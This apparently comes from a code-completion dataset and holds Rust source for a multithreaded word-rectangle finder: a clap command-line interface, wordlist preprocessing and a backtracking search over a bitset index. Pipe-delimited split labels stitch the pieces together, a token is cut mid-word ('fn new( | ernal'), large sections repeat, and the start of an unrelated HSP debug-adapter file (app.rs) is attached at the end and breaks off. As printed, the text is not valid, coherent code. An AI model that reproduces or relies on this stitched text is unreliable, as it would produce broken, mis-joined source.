#[cfg(feature = "height-13")]
const WORD_SQUARE_HEIGHT:usize = 13;
#[cfg(feature = "height-14")]
const WORD_SQUARE_HEIGHT:usize = 14;
#[cfg(feature = "height-15")]
const WORD_SQUARE_HEIGHT:usize = 15;
//const WORD_ORDER_U8:u8 = WORD_SQUARE_ORDER as u8;
const WORD_SQUARE_SIZE:usize = WORD_SQUARE_WIDTH * WORD_SQUARE_HEIGHT;
type WideWord = [u8; WORD_SQUARE_WIDTH];
type TallWord = [u8; WORD_SQUARE_HEIGHT];
type WordSquare = [u8; WORD_SQUARE_SIZE];
#[derive(Debug,Default)]
struct WordIndex {
inner_rows: FnvHashMap<WideWord,CharSet>,
#[cfg(not(feature = "square"))]
inner_cols: FnvHashMap<TallWord,CharSet>,
}
impl WordIndex {
fn rows(&self) -> &FnvHashMap<WideWord,CharSet> {
&self.inner_rows
}
fn cols(&self) -> &FnvHashMap<TallWord,CharSet> {
#[cfg(not(feature = "square"))]
return &self.inner_cols;
#[cfg(feature = "square")]
return self.rows();
}
fn rows_mut(&mut self) -> &mut FnvHashMap<WideWord,CharSet> {
&mut self.inner_rows
}
#[cfg(not(feature = "square"))]
fn cols_mut(&mut self) -> &mut FnvHashMap<TallWord,CharSet> {
&mut self.inner_cols
}
}
fn print_word_square(sq:WordSquare){
let mut first = true;
for i in 0..WORD_SQUARE_HEIGHT {
let mut chars = Vec::new();
for j in 0..WORD_SQUARE_WIDTH {
chars.push(decode(sq[i*WORD_SQUARE_WIDTH + j]).unwrap());
}
let word = chars.iter().collect::<String>();
if !first {
print!("-");
}
print!("{}", word);
first = false;
}
println!();
}
fn main() -> io::Result<()> {
let matches = App::new(format!("Rust Word Rectangle Finder o{}x{}", WORD_SQUARE_WIDTH, WORD_SQUARE_HEIGHT))
.version(crate_version!()) | .setting(clap::AppSettings::SubcommandRequired)
.subcommand(SubCommand::with_name("compute")
.about("Does the actual computation.")
.arg(Arg::with_name("threads")
.default_value("4")
.takes_value(true)
.validator(|arg| {
match arg.parse::<u32>() {
Ok(_) => Ok(()),
Err(e) => Err(String::from(format!("Must provide a valid integer. {:?}", e))),
}
})
.help("Number of threads to use.")
.long("threads")
.short("t")
)
.arg(Arg::with_name("wordlist")
.required(true)
.help("the wordlist file path, a plain-text UTF-8 file with each word separated by a newline")
)
.arg(Arg::with_name("ignore-empty-wordlist")
.long("ignore-empty-wordlist")
.help("Don't complain if there are no words of the necessary length in the given wordlist")
)
.arg(Arg::with_name("ignore-unencodeable")
.long("ignore-unencodeable")
.help("Don't show a warning when a word is dropped because it contains unencodeable characters.")
)
.arg(Arg::with_name("quiet")
.long("quiet")
.short("q")
.help("Don't show any status messages; STDERR will be empty if no errors occured.")
)
)
.subcommand(SubCommand::with_name("wordlist-preprocess")
.about("Takes in a wordlist (of various formats) and converts characters to a consistent set, for example 'а' (U+0430 CYRILLIC SMALL LETTER A) becomes 'a' (U+0061 LATIN SMALL LETTER A). Any words that would be ignored by the compute function are also filtered out.")
.arg(Arg::with_name("wiktionary-list-format")
.long("wiktionary-format")
.short("w")
.long_help("Input wordlist is in wiktionary \"all-titles\" format.")
.group("format")
)
.arg(Arg::with_name("plain-list-format")
.long("plain-format")
.short("p")
.long_help("Input wordlist is a plaintext UTF-8 newline-separated list of words")
.group("format")
)
.arg(Arg::with_name("input-filename")
.required(true)
.help("The path to the wordlist to read from, or \"-\" for stdin")
)
.arg(Arg::with_name("output-filename")
.required(true)
.help("The path to the wordlist to write to, or \"-\" for stdout")
)
).get_matches();
//println!("{:?}", matches.is_present("wordlist-preprocess"));
return match matches.subcommand() {
("compute", Some(m)) => compute_command(m),
("wordlist-preprocess", Some(m)) => wordlist_preprocess(m),
_ => panic!("This shouldn't happen"),
}
/*let mut args:Vec<String> = std::env::args().collect();
if args.len() < 2 {
eprintln!("Must have at least one argument (which sub-thing to run)");
return Ok(());
}
eprintln!("{:?}", args);
args.remove(0);
eprintln!("{:?}", args);
let name:&str = &(args.remove(0));
eprintln!("{:?}", args);
match name {
"wordlist-preprocess" => return wordlist_preprocess(args),
"compute" => return compute_command(args),
unfound_command => eprintln!("unrecognized command {}", unfound_command),
}*/
}
fn filter_word(word:&str) -> Option<String> {
let mut success = true;
let res = Some(word.chars().map(|c| {
match encode(c) {
Some(_) => c,
None => {
let chars:Vec<char> = c.to_string().skeleton_chars().collect();
if chars.len() != 1 {
success = false;
'a'
} else {
match encode(chars[0]) {
Some(_) => chars[0],
None => {success = false; 'a'},
}
}
},
}
}).collect::<String>());
if success {
return res
} else {
return None
}
}
fn wordlist_preprocess(args:&ArgMatches) -> io::Result<()> {
let in_file = File::open( args.value_of("input-filename" ).unwrap())?;
let out_file = File::create(args.value_of("output-filename").unwrap())?;
let wik_format = args.is_present("wiktionary-list-format");
let f = BufReader::new(in_file);
let mut fo = BufWriter::new(out_file);
let mut lines = f.lines();
if wik_format {
//Skip the first line
lines.next().unwrap()?;
}
for line_result in lines {
let line = line_result?;
let word;
if wik_format {
let mut split = line.split('\t');
split.next().unwrap(); // skip before tab
word = split.next().unwrap();
match split.next() {
Some(_) => panic!("Only one tab expected per line"),
None => (),
}
} else {
word = &line
}
match filter_word(word) {
Some(word) => writeln!(&mut fo, "{}", word)?,
None => (),
}
}
fo.flush()?;
return Ok(());
}
fn make_words_index(
f_in: impl BufRead,
ignore_unencodeable: bool,
) -> io::Result<(u32, u32, WordIndex)> {
let mut index = WordIndex::default();
let mut count_row_words = 0;
#[cfg(not(feature = "square"))]
let mut count_col_words = 0;
let lines = f_in.lines();
for line_result in lines {
let word = line_result?;
let chars:Vec<char> = word.chars().collect();
if chars.len() != WORD_SQUARE_WIDTH && chars.len() != WORD_SQUARE_HEIGHT { continue }
let mut codes = Vec::new();
let mut all_encoded = true;
for c in chars.clone() {
match encode(c) {
Some(code) => codes.push(code),
None => {
all_encoded = false;
continue
},
}
}
if !all_encoded {
if !ignore_unencodeable {
eprintln!("Skipping {:?}, not all could be encoded",chars);
}
continue
}
if codes.len() == WORD_SQUARE_WIDTH {
count_row_words += 1;
let words_index = index.rows_mut();
let mut word = WideWord::default();
for (i, code) in codes.iter().enumerate() {
word[i] = *code;
}
for j in 0..WORD_SQUARE_WIDTH {
let i = (WORD_SQUARE_WIDTH - 1) - j;
// for i in WORD_SQUARE_ORDER..0 including 0, excluding WORD_SQUARE_ORDER
let code = word[i];
word[i] = 255u8;
if !words_index.contains_key(&word) {
//println!("Inserting {:?}", word);
words_index.insert(word, CharSet::default());
}
words_index.get_mut(&word).unwrap().add(code);
}
}
#[cfg(not(feature = "square"))]
if codes.len() == WORD_SQUARE_HEIGHT {
count_col_words += 1;
let words_index = index.cols_mut();
let mut word = TallWord::default();
for (i, code) in codes.iter().enumerate() {
word[i] = *code;
}
for j in 0..WORD_SQUARE_HEIGHT {
let i = (WORD_SQUARE_HEIGHT - 1) - j;
// for i in WORD_SQUARE_ORDER..0 including 0, excluding WORD_SQUARE_ORDER
let code = word[i];
word[i] = 255u8;
if !words_index.contains_key(&word) {
//println!("Inserting {:?}", word);
words_index.insert(word, CharSet::default());
}
words_index.get_mut(&word).unwrap().add(code);
}
}
}
#[cfg(feature = "square")]
let count_col_words = count_row_words;
return Ok((count_row_words, count_col_words, index));
}
fn compute_command(args:&ArgMatches) -> io::Result<()> {
let loud = !args.is_present("quiet");
let ignore_empty_wordlist = args.is_present("ignore-empty-wordlist");
let ignore_unencodeable = args.is_present("ignore-unencodeable");
if loud {
eprintln!("Word square order is {}x{}", WORD_SQUARE_WIDTH, WORD_SQUARE_HEIGHT);
eprintln!("Start: creating index.");
}
let num_threads:u32 = args.value_of("threads").unwrap().parse().unwrap();
let plain_f = File::open(args.value_of("wordlist").unwrap())?;
let f = BufReader::new(plain_f);
let (count_row_words, count_col_words, index) = make_words_index(f, ignore_unencodeable)?;
if !ignore_empty_wordlist && (index.rows().is_empty() || index.cols().is_empty()) {
panic!("No words in wordlist!");
}
if loud {
eprintln!("Finished creating index, {} words x {} words.", count_row_words, count_col_words);
}
let (m2w_tx, m2w_rx) = spmc::channel::<(WordSquare,u8)>();
let (w2m_tx, w2m_rx) = std::sync::mpsc::sync_channel(16);
let mut worker_handles = Vec::new();
if loud {
eprintln!("Creating {} worker threads.", num_threads);
}
let index_arc = std::sync::Arc::new(index);
for _ in 0..num_threads {
let rxc = m2w_rx.clone();
let txc = w2m_tx.clone();
let my_index = std::sync::Arc::clone(&index_arc);
worker_handles.push(
thread::spawn( move || {
while let Ok(msg) = rxc.recv() {
compute(
&my_index,
msg.0,
msg.1,
WORD_SQUARE_SIZE as u8,
|a,b| txc.send((a,b)).unwrap()
);
}
})
);
}
drop(w2m_tx);
let printing_thread = thread::spawn(move || {
while let Ok(msg) = w2m_rx.recv() {
print_word_square(msg.0);
}
});
let code_array = [255u8; WORD_SQUARE_SIZE];
if loud {
eprintln!("Starting.");
}
compute(
index_arc.as_ref(),
code_array,
0u8,
WORD_SQUARE_WIDTH as u8,
|ca, idx| m2w_tx.send((ca,idx)).unwrap()
);
drop(m2w_tx);
//println!("Dropped");
for h in worker_handles {
h.join().unwrap();
//println!("Worker finished");
}
printing_thread.join().unwrap();
//println!("printing thread finished");
/*let mut char_counts:Vec<(char,u64)> = unused_chars.drain().collect();
char_counts.sort_unstable_by_key(|t| t.1);
for (k,v) in char_counts.iter() {
println!("Char {:?} had {} instances", k, v);
}*/
Ok(())
}
const DEBUG_MODE:bool = false;
fn compute<T:FnMut(WordSquare,u8)>(
words_index_arg:&WordIndex,
mut code_array:WordSquare,
start_idx:u8,
target_idx:u8,
mut on_result:T,
) {
let mut at_idx = start_idx;
let mut charset_array = [CharSet::new(std::u32::MAX); WORD_SQUARE_SIZE];
let row_idx = at_idx / (WORD_SQUARE_WIDTH as u8);
let col_idx = at_idx % (WORD_SQUARE_WIDTH as u8);
let row_start = row_idx*(WORD_SQUARE_WIDTH as u8);
let mut row_word = [255u8; WORD_SQUARE_WIDTH];
for i in 0..col_idx {
row_word[i as usize] = code_array[ (row_start+i) as usize ];
}
let row_wordset = words_index_arg.rows()[&row_word];
let mut col_word = [255u8; WORD_SQUARE_HEIGHT];
for i in 0..row_idx {
col_word[i as usize] = code_array[ (col_idx + i*(WORD_SQUARE_WIDTH as u8)) as usize ];
}
let col_wordset = words_index_arg.cols()[&col_word];
charset_array[at_idx as usize] = col_wordset.and(&row_wordset);
// wrap to go from 0 to 255
let end_idx = start_idx.wrapping_sub(1);
while at_idx != end_idx {
// wrap to go from 255 (initial) to 0
if DEBUG_MODE {
println!();
println!(
"idx {} before wrapping add is {}",
at_idx,
code_array[at_idx as usize]
);
}
code_array[at_idx as usize] = code_array[at_idx as usize].wrapping_add(1);
if DEBUG_MODE {
let row_idx = at_idx / (WORD_SQUARE_WIDTH as u8);
let col_idx = at_idx % (WORD_SQUARE_WIDTH as u8);
for row in 0..WORD_SQUARE_HEIGHT {
for col in 0..WORD_SQUARE_WIDTH {
print!("{}, ", decode(code_array[row*WORD_SQUARE_WIDTH + col]).unwrap());
}
println!();
}
println!("row_idx {}, col_idx {}", row_idx, col_idx);
}
let cur_code = code_array[at_idx as usize];
if DEBUG_MODE { println!("cur_code {}", cur_code); }
let cur_charset = charset_array[at_idx as usize];
if cur_code == 32 {
code_array[at_idx as usize] = 255u8;
at_idx = at_idx.wrapping_sub(1)
} else if cur_charset.has(cur_code) {
at_idx += 1;
if at_idx == target_idx {
//print_word_square(code_array);
(&mut on_result)(code_array, at_idx);
at_idx -= 1;
} else {
code_array[at_idx as usize] = 255;
let row_idx = at_idx / (WORD_SQUARE_WIDTH as u8);
let col_idx = at_idx % (WORD_SQUARE_WIDTH as u8);
let row_start = row_idx*(WORD_SQUARE_WIDTH as u8);
let mut row_word = [255u8; WORD_SQUARE_WIDTH];
for i in 0..col_idx {
row_word[i as usize] = code_array[ (row_start+i) as usize ];
}
//println!("row_word {:?}", row_word);
let row_wordset = words_index_arg.rows()[&row_word];
let mut col_word = [255u8; WORD_SQUARE_HEIGHT];
for i in 0..row_idx {
col_word[i as usize] = code_array[ (col_idx + i*(WORD_SQUARE_WIDTH as u8)) as usize ];
}
//println!("col_word {:?}", row_word);
let col_wordset = words_index_arg.cols()[&col_word];
charset_array[at_idx as usize] = col_wordset.and(&row_wordset);
}
}
}
} | .author(crate_authors!())
.about(crate_description!()) | random_line_split |
main.rs | //#![feature(exclusive_range_pattern)]
#![feature(nll)]
extern crate fnv;
extern crate spmc;
extern crate unicode_skeleton;
#[macro_use]
extern crate clap;
use std::default::Default;
use std::vec::Vec;
use std::io::{self, BufReader, BufWriter};
use std::io::prelude::*;
use std::fs::File;
use std::thread;
use fnv::FnvHashMap;
use unicode_skeleton::UnicodeSkeleton;
use clap::{Arg, App, SubCommand, ArgMatches};
macro_rules! make_encode_decode {
(
$( $num:expr => $char:expr; )+
) => {
fn encode(from:char) -> Option<u8> {
let res:u8 = match from {
$(
$char => $num,
)+
_ => return None,
};
return Some(res)
}
fn decode(code:u8) -> Option<char> {
let res:char = match code {
$(
$num => $char,
)+
255 => '#',
32 => '$',
_ => return None,
};
return Some(res)
}
}
}
make_encode_decode!{
0 => 'a';
1 => 'e';
2 => 'i';
3 => 'o';
4 => 'r';
5 => 'n';
6 => 'l';
7 => 's';
8 => 't';
9 => 'u';
10 => 'p';
11 => 'c';
12 => 'd';
13 => 'k';
14 => 'y';
15 => 'g';
16 => 'h';
17 => 'b';
18 => 'v';
19 => 'f';
20 => 'w';
21 => 'z';
22 => 'j';
23 => 'x';
24 => '\'';
25 => '-';
26 => 'è';
27 => 'ê';
28 => 'ñ';
29 => 'é';
30 => 'm';
31 => 'q';
}
#[derive(Debug,Clone,Copy,PartialEq,Eq)]
struct CharSet {
pub internal:u32
}
impl CharSet {
fn new( | ernal:u32) -> CharSet {
return CharSet{internal}
}
fn add(&mut self, val:u8) {
if val > 31 {panic!("Invalid val {}", val)}
self.internal |= 2u32.pow(val as u32)
}
fn and(&self, other:&Self) -> Self {
Self{ internal: self.internal & other.internal }
}
fn has(&self, val:u8) -> bool {
if val > 31 {
panic!("Invalid val {}", val)
} else {
return (self.internal & 2u32.pow(val as u32)) > 0
}
}
}
impl Default for CharSet {
fn default() -> Self {
CharSet::new(0)
}
}
// NOTE: can only go up to 15. 16 would break everything
//const WORD_SQUARE_ORDER:usize = 6;
// const WORD_SQUARE_WIDTH:usize = 8;
// const WORD_SQUARE_HEIGHT:usize = 6;
#[cfg(feature = "width-2")]
const WORD_SQUARE_WIDTH:usize = 2;
#[cfg(feature = "width-3")]
const WORD_SQUARE_WIDTH:usize = 3;
#[cfg(feature = "width-4")]
const WORD_SQUARE_WIDTH:usize = 4;
#[cfg(feature = "width-5")]
const WORD_SQUARE_WIDTH:usize = 5;
#[cfg(feature = "width-6")]
const WORD_SQUARE_WIDTH:usize = 6;
#[cfg(feature = "width-7")]
const WORD_SQUARE_WIDTH:usize = 7;
#[cfg(feature = "width-8")]
const WORD_SQUARE_WIDTH:usize = 8;
#[cfg(feature = "width-9")]
const WORD_SQUARE_WIDTH:usize = 9;
#[cfg(feature = "width-10")]
const WORD_SQUARE_WIDTH:usize = 10;
#[cfg(feature = "width-11")]
const WORD_SQUARE_WIDTH:usize = 11;
#[cfg(feature = "width-12")]
const WORD_SQUARE_WIDTH:usize = 12;
#[cfg(feature = "width-13")]
const WORD_SQUARE_WIDTH:usize = 13;
#[cfg(feature = "width-14")]
const WORD_SQUARE_WIDTH:usize = 14;
#[cfg(feature = "width-15")]
const WORD_SQUARE_WIDTH:usize = 15;
#[cfg(feature = "height-2")]
const WORD_SQUARE_HEIGHT:usize = 2;
#[cfg(feature = "height-3")]
const WORD_SQUARE_HEIGHT:usize = 3;
#[cfg(feature = "height-4")]
const WORD_SQUARE_HEIGHT:usize = 4;
#[cfg(feature = "height-5")]
const WORD_SQUARE_HEIGHT:usize = 5;
#[cfg(feature = "height-6")]
const WORD_SQUARE_HEIGHT:usize = 6;
#[cfg(feature = "height-7")]
const WORD_SQUARE_HEIGHT:usize = 7;
#[cfg(feature = "height-8")]
const WORD_SQUARE_HEIGHT:usize = 8;
#[cfg(feature = "height-9")]
const WORD_SQUARE_HEIGHT:usize = 9;
#[cfg(feature = "height-10")]
const WORD_SQUARE_HEIGHT:usize = 10;
#[cfg(feature = "height-11")]
const WORD_SQUARE_HEIGHT:usize = 11;
#[cfg(feature = "height-12")]
const WORD_SQUARE_HEIGHT:usize = 12;
#[cfg(feature = "height-13")]
const WORD_SQUARE_HEIGHT:usize = 13;
#[cfg(feature = "height-14")]
const WORD_SQUARE_HEIGHT:usize = 14;
#[cfg(feature = "height-15")]
const WORD_SQUARE_HEIGHT:usize = 15;
//const WORD_ORDER_U8:u8 = WORD_SQUARE_ORDER as u8;
const WORD_SQUARE_SIZE:usize = WORD_SQUARE_WIDTH * WORD_SQUARE_HEIGHT;
type WideWord = [u8; WORD_SQUARE_WIDTH];
type TallWord = [u8; WORD_SQUARE_HEIGHT];
type WordSquare = [u8; WORD_SQUARE_SIZE];
#[derive(Debug,Default)]
struct WordIndex {
inner_rows: FnvHashMap<WideWord,CharSet>,
#[cfg(not(feature = "square"))]
inner_cols: FnvHashMap<TallWord,CharSet>,
}
impl WordIndex {
fn rows(&self) -> &FnvHashMap<WideWord,CharSet> {
&self.inner_rows
}
fn cols(&self) -> &FnvHashMap<TallWord,CharSet> {
#[cfg(not(feature = "square"))]
return &self.inner_cols;
#[cfg(feature = "square")]
return self.rows();
}
fn rows_mut(&mut self) -> &mut FnvHashMap<WideWord,CharSet> {
&mut self.inner_rows
}
#[cfg(not(feature = "square"))]
fn cols_mut(&mut self) -> &mut FnvHashMap<TallWord,CharSet> {
&mut self.inner_cols
}
}
fn print_word_square(sq:WordSquare){
let mut first = true;
for i in 0..WORD_SQUARE_HEIGHT {
let mut chars = Vec::new();
for j in 0..WORD_SQUARE_WIDTH {
chars.push(decode(sq[i*WORD_SQUARE_WIDTH + j]).unwrap());
}
let word = chars.iter().collect::<String>();
if !first {
print!("-");
}
print!("{}", word);
first = false;
}
println!();
}
fn main() -> io::Result<()> {
let matches = App::new(format!("Rust Word Rectangle Finder o{}x{}", WORD_SQUARE_WIDTH, WORD_SQUARE_HEIGHT))
.version(crate_version!())
.author(crate_authors!())
.about(crate_description!())
.setting(clap::AppSettings::SubcommandRequired)
.subcommand(SubCommand::with_name("compute")
.about("Does the actual computation.")
.arg(Arg::with_name("threads")
.default_value("4")
.takes_value(true)
.validator(|arg| {
match arg.parse::<u32>() {
Ok(_) => Ok(()),
Err(e) => Err(String::from(format!("Must provide a valid integer. {:?}", e))),
}
})
.help("Number of threads to use.")
.long("threads")
.short("t")
)
.arg(Arg::with_name("wordlist")
.required(true)
.help("the wordlist file path, a plain-text UTF-8 file with each word separated by a newline")
)
.arg(Arg::with_name("ignore-empty-wordlist")
.long("ignore-empty-wordlist")
.help("Don't complain if there are no words of the necessary length in the given wordlist")
)
.arg(Arg::with_name("ignore-unencodeable")
.long("ignore-unencodeable")
.help("Don't show a warning when a word is dropped because it contains unencodeable characters.")
)
.arg(Arg::with_name("quiet")
.long("quiet")
.short("q")
.help("Don't show any status messages; STDERR will be empty if no errors occured.")
)
)
.subcommand(SubCommand::with_name("wordlist-preprocess")
.about("Takes in a wordlist (of various formats) and converts characters to a consistent set, for example 'а' (U+0430 CYRILLIC SMALL LETTER A) becomes 'a' (U+0061 LATIN SMALL LETTER A). Any words that would be ignored by the compute function are also filtered out.")
.arg(Arg::with_name("wiktionary-list-format")
.long("wiktionary-format")
.short("w")
.long_help("Input wordlist is in wiktionary \"all-titles\" format.")
.group("format")
)
.arg(Arg::with_name("plain-list-format")
.long("plain-format")
.short("p")
.long_help("Input wordlist is a plaintext UTF-8 newline-separated list of words")
.group("format")
)
.arg(Arg::with_name("input-filename")
.required(true)
.help("The path to the wordlist to read from, or \"-\" for stdin")
)
.arg(Arg::with_name("output-filename")
.required(true)
.help("The path to the wordlist to write to, or \"-\" for stdout")
)
).get_matches();
//println!("{:?}", matches.is_present("wordlist-preprocess"));
return match matches.subcommand() {
("compute", Some(m)) => compute_command(m),
("wordlist-preprocess", Some(m)) => wordlist_preprocess(m),
_ => panic!("This shouldn't happen"),
}
/*let mut args:Vec<String> = std::env::args().collect();
if args.len() < 2 {
eprintln!("Must have at least one argument (which sub-thing to run)");
return Ok(());
}
eprintln!("{:?}", args);
args.remove(0);
eprintln!("{:?}", args);
let name:&str = &(args.remove(0));
eprintln!("{:?}", args);
match name {
"wordlist-preprocess" => return wordlist_preprocess(args),
"compute" => return compute_command(args),
unfound_command => eprintln!("unrecognized command {}", unfound_command),
}*/
}
fn filter_word(word:&str) -> Option<String> {
let mut success = true;
let res = Some(word.chars().map(|c| {
match encode(c) {
Some(_) => c,
None => {
let chars:Vec<char> = c.to_string().skeleton_chars().collect();
if chars.len() != 1 {
success = false;
'a'
} else {
match encode(chars[0]) {
Some(_) => chars[0],
None => {success = false; 'a'},
}
}
},
}
}).collect::<String>());
if success {
return res
} else {
return None
}
}
fn wordlist_preprocess(args:&ArgMatches) -> io::Result<()> {
let in_file = File::open( args.value_of("input-filename" ).unwrap())?;
let out_file = File::create(args.value_of("output-filename").unwrap())?;
let wik_format = args.is_present("wiktionary-list-format");
let f = BufReader::new(in_file);
let mut fo = BufWriter::new(out_file);
let mut lines = f.lines();
if wik_format {
//Skip the first line
lines.next().unwrap()?;
}
for line_result in lines {
let line = line_result?;
let word;
if wik_format {
let mut split = line.split('\t');
split.next().unwrap(); // skip before tab
word = split.next().unwrap();
match split.next() {
Some(_) => panic!("Only one tab expected per line"),
None => (),
}
} else {
word = &line
}
match filter_word(word) {
Some(word) => writeln!(&mut fo, "{}", word)?,
None => (),
}
}
fo.flush()?;
return Ok(());
}
fn make_words_index(
f_in: impl BufRead,
ignore_unencodeable: bool,
) -> io::Result<(u32, u32, WordIndex)> {
let mut index = WordIndex::default();
let mut count_row_words = 0;
#[cfg(not(feature = "square"))]
let mut count_col_words = 0;
let lines = f_in.lines();
for line_result in lines {
let word = line_result?;
let chars:Vec<char> = word.chars().collect();
if chars.len() != WORD_SQUARE_WIDTH && chars.len() != WORD_SQUARE_HEIGHT { continue }
let mut codes = Vec::new();
let mut all_encoded = true;
for c in chars.clone() {
match encode(c) {
Some(code) => codes.push(code),
None => {
all_encoded = false;
continue
},
}
}
if !all_encoded {
if !ignore_unencodeable {
eprintln!("Skipping {:?}, not all could be encoded",chars);
}
continue
}
if codes.len() == WORD_SQUARE_WIDTH {
count_row_words += 1;
let words_index = index.rows_mut();
let mut word = WideWord::default();
for (i, code) in codes.iter().enumerate() {
word[i] = *code;
}
for j in 0..WORD_SQUARE_WIDTH {
let i = (WORD_SQUARE_WIDTH - 1) - j;
// for i in WORD_SQUARE_ORDER..0 including 0, excluding WORD_SQUARE_ORDER
let code = word[i];
word[i] = 255u8;
if !words_index.contains_key(&word) {
//println!("Inserting {:?}", word);
words_index.insert(word, CharSet::default());
}
words_index.get_mut(&word).unwrap().add(code);
}
}
#[cfg(not(feature = "square"))]
if codes.len() == WORD_SQUARE_HEIGHT {
count_col_words += 1;
let words_index = index.cols_mut();
let mut word = TallWord::default();
for (i, code) in codes.iter().enumerate() {
word[i] = *code;
}
for j in 0..WORD_SQUARE_HEIGHT {
let i = (WORD_SQUARE_HEIGHT - 1) - j;
// for i in WORD_SQUARE_ORDER..0 including 0, excluding WORD_SQUARE_ORDER
let code = word[i];
word[i] = 255u8;
if !words_index.contains_key(&word) {
//println!("Inserting {:?}", word);
words_index.insert(word, CharSet::default());
}
words_index.get_mut(&word).unwrap().add(code);
}
}
}
#[cfg(feature = "square")]
let count_col_words = count_row_words;
return Ok((count_row_words, count_col_words, index));
}
fn compute_command(args:&ArgMatches) -> io::Result<()> {
let loud = !args.is_present("quiet");
let ignore_empty_wordlist = args.is_present("ignore-empty-wordlist");
let ignore_unencodeable = args.is_present("ignore-unencodeable");
if loud {
eprintln!("Word square order is {}x{}", WORD_SQUARE_WIDTH, WORD_SQUARE_HEIGHT);
eprintln!("Start: creating index.");
}
let num_threads:u32 = args.value_of("threads").unwrap().parse().unwrap();
let plain_f = File::open(args.value_of("wordlist").unwrap())?;
let f = BufReader::new(plain_f);
let (count_row_words, count_col_words, index) = make_words_index(f, ignore_unencodeable)?;
if !ignore_empty_wordlist && (index.rows().is_empty() || index.cols().is_empty()) {
panic!("No words in wordlist!");
}
if loud {
eprintln!("Finished creating index, {} words x {} words.", count_row_words, count_col_words);
}
let (m2w_tx, m2w_rx) = spmc::channel::<(WordSquare,u8)>();
let (w2m_tx, w2m_rx) = std::sync::mpsc::sync_channel(16);
let mut worker_handles = Vec::new();
if loud {
eprintln!("Creating {} worker threads.", num_threads);
}
let index_arc = std::sync::Arc::new(index);
for _ in 0..num_threads {
let rxc = m2w_rx.clone();
let txc = w2m_tx.clone();
let my_index = std::sync::Arc::clone(&index_arc);
worker_handles.push(
thread::spawn( move || {
while let Ok(msg) = rxc.recv() {
compute(
&my_index,
msg.0,
msg.1,
WORD_SQUARE_SIZE as u8,
|a,b| txc.send((a,b)).unwrap()
);
}
})
);
}
drop(w2m_tx);
let printing_thread = thread::spawn(move || {
while let Ok(msg) = w2m_rx.recv() {
print_word_square(msg.0);
}
});
let code_array = [255u8; WORD_SQUARE_SIZE];
if loud {
eprintln!("Starting.");
}
compute(
index_arc.as_ref(),
code_array,
0u8,
WORD_SQUARE_WIDTH as u8,
|ca, idx| m2w_tx.send((ca,idx)).unwrap()
);
drop(m2w_tx);
//println!("Dropped");
for h in worker_handles {
h.join().unwrap();
//println!("Worker finished");
}
printing_thread.join().unwrap();
//println!("printing thread finished");
/*let mut char_counts:Vec<(char,u64)> = unused_chars.drain().collect();
char_counts.sort_unstable_by_key(|t| t.1);
for (k,v) in char_counts.iter() {
println!("Char {:?} had {} instances", k, v);
}*/
Ok(())
}
const DEBUG_MODE:bool = false;
fn compute<T:FnMut(WordSquare,u8)>(
words_index_arg:&WordIndex,
mut code_array:WordSquare,
start_idx:u8,
target_idx:u8,
mut on_result:T,
) {
let mut at_idx = start_idx;
let mut charset_array = [CharSet::new(std::u32::MAX); WORD_SQUARE_SIZE];
let row_idx = at_idx / (WORD_SQUARE_WIDTH as u8);
let col_idx = at_idx % (WORD_SQUARE_WIDTH as u8);
let row_start = row_idx*(WORD_SQUARE_WIDTH as u8);
let mut row_word = [255u8; WORD_SQUARE_WIDTH];
for i in 0..col_idx {
row_word[i as usize] = code_array[ (row_start+i) as usize ];
}
let row_wordset = words_index_arg.rows()[&row_word];
let mut col_word = [255u8; WORD_SQUARE_HEIGHT];
for i in 0..row_idx {
col_word[i as usize] = code_array[ (col_idx + i*(WORD_SQUARE_WIDTH as u8)) as usize ];
}
let col_wordset = words_index_arg.cols()[&col_word];
charset_array[at_idx as usize] = col_wordset.and(&row_wordset);
// wrap to go from 0 to 255
let end_idx = start_idx.wrapping_sub(1);
while at_idx != end_idx {
// wrap to go from 255 (initial) to 0
if DEBUG_MODE {
println!();
println!(
"idx {} before wrapping add is {}",
at_idx,
code_array[at_idx as usize]
);
}
code_array[at_idx as usize] = code_array[at_idx as usize].wrapping_add(1);
if DEBUG_MODE {
let row_idx = at_idx / (WORD_SQUARE_WIDTH as u8);
let col_idx = at_idx % (WORD_SQUARE_WIDTH as u8);
for row in 0..WORD_SQUARE_HEIGHT {
for col in 0..WORD_SQUARE_WIDTH {
print!("{}, ", decode(code_array[row*WORD_SQUARE_WIDTH + col]).unwrap());
}
println!();
}
println!("row_idx {}, col_idx {}", row_idx, col_idx);
}
let cur_code = code_array[at_idx as usize];
if DEBUG_MODE { println!("cur_code {}", cur_code); }
let cur_charset = charset_array[at_idx as usize];
if cur_code == 32 {
code_array[at_idx as usize] = 255u8;
at_idx = at_idx.wrapping_sub(1)
} else if cur_charset.has(cur_code) {
at_idx += 1;
if at_idx == target_idx {
//print_word_square(code_array);
(&mut on_result)(code_array, at_idx);
at_idx -= 1;
} else {
code_array[at_idx as usize] = 255;
let row_idx = at_idx / (WORD_SQUARE_WIDTH as u8);
let col_idx = at_idx % (WORD_SQUARE_WIDTH as u8);
let row_start = row_idx*(WORD_SQUARE_WIDTH as u8);
let mut row_word = [255u8; WORD_SQUARE_WIDTH];
for i in 0..col_idx {
row_word[i as usize] = code_array[ (row_start+i) as usize ];
}
//println!("row_word {:?}", row_word);
let row_wordset = words_index_arg.rows()[&row_word];
let mut col_word = [255u8; WORD_SQUARE_HEIGHT];
for i in 0..row_idx {
col_word[i as usize] = code_array[ (col_idx + i*(WORD_SQUARE_WIDTH as u8)) as usize ];
}
//println!("col_word {:?}", row_word);
let col_wordset = words_index_arg.cols()[&col_word];
charset_array[at_idx as usize] = col_wordset.and(&row_wordset);
}
}
}
}
| int | identifier_name |
app.rs | use crate::connection;
use crate::debug_adapter_protocol as dap;
use crate::hsp_ext;
use crate::hsprt;
use crate::hspsdk;
use std;
use std::path::PathBuf;
use std::sync::mpsc;
use std::thread;
const MAIN_THREAD_ID: i64 = 1;
const MAIN_THREAD_NAME: &'static str = "main";
fn threads() -> Vec<dap::Thread> {
vec![dap::Thread {
id: MAIN_THREAD_ID,
name: MAIN_THREAD_NAME.to_owned(),
}]
}
/// グローバル変数からなるスコープの変数参照Id
const GLOBAL_SCOPE_REF: i64 = 1;
/// HSP の変数や変数の要素、あるいは変数をまとめるもの (モジュールなど) を指し示すもの。
#[derive(Clone, Debug)]
pub(crate) enum VarPath {
Globals,
Static(usize),
}
/// Variables reference. VSCode が変数や変数要素を指し示すために使う整数値。
pub(crate) type VarRef = i64;
impl VarPath {
pub fn to_var_ref(&self) -> VarRef {
match *self {
VarPath::Globals => 1,
VarPath::Static(i) => 2 + i as i64,
}
}
